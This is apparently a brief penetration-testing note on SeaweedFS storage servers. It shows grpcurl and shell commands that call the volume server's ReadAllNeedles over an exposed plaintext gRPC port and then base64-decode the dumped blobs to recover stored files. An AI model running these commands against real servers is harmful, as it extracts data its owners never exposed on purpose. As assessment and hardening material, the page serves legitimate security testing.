SeaweedFS

SeaweedFS is a fast distributed storage system for blobs, objects, files, and data lake

In the web u can get Volumes info, disk stats, etc...

You can find grpc port on the same host and get needls

grpcurl -plaintext -d '{"volumeIds": [volume_id_from_web]}' ip:port volume_server_pb.VolumeServer.ReadAllNeedles | tee -a volume.json

cat volume.json | grep needleBlob | awk '{print $2}' | tr -d "\"," | base64 -d | tee -a debase.txt

Last updated